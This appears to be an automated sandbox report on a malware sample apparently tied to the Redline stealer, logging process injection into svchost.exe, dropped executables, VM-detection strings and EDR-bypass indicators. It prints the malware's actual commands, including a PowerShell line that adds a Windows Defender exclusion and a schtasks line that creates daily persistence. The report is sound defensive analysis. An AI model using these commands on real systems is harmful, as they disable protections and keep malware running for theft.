                        Source: alg.exe, 00000005.00000003.2372432615.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2568800965.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2389205186.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2904771126.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2771431034.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2698840513.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2197258729.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2421987511.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2821864703.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3108228485.00000000004A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW^
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: P|OVMware Virtual USB MouseC:\Windows\System32\DDORes.dll,-2212
                        Source: microsofts.exe, 00000003.00000003.2152690816.000000000521F000.00000004.00000020.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2153701229.0000000005238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                        Source: SensorDataService.exe, 00000020.00000003.2272167666.00000000004E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
                        Source: build.exe, 00000006.00000002.3353405465.0000000001649000.00000004.00000020.00020000.00000000.sdmp, ssh-agent.exe, 00000025.00000002.3331647450.000000000055D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0538F520 mov eax, dword ptr fs:[00000030h]0_2_0538F520
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0538F4C0 mov eax, dword ptr fs:[00000030h]0_2_0538F4C0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0538DE80 mov eax, dword ptr fs:[00000030h]0_2_0538DE80
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04E13F3D mov eax, dword ptr fs:[00000030h]2_2_04E13F3D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DD1130 mov eax, dword ptr fs:[00000030h]2_2_04DD1130
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess token adjusted: Debug
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004015D7 SetUnhandledExceptionFilter,2_2_004015D7
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004015D7 SetUnhandledExceptionFilter,2_2_004015D7
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04E14C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_04E14C7B
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04E11361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_04E11361
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Found direct / indirect Syscall (likely to bypass EDR)
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9B
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9F
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
                        Maps a DLL or memory area into another process
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C05008Jump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AENiBH7X1q.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\microsofts.exe "C:\Users\user\AppData\Local\Temp\microsofts.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpEAAD.tmp.cmd""
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DF8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,2_2_04DF8550
                        Source: AENiBH7X1q.exeBinary or memory string: Shell_TrayWnd
                        Source: AENiBH7X1q.exe, 00000000.00000000.2068986653.0000000000482000.00000002.00000001.01000000.00000003.sdmp, AENiBH7X1q.exe, 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
                        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTEF8F.tmp VolumeInformation
                        Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTEF90.tmp VolumeInformation
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\msdtc.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\SensorDataService.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\TieringEngineService.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\AgentService.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\vds.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\wbengine.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
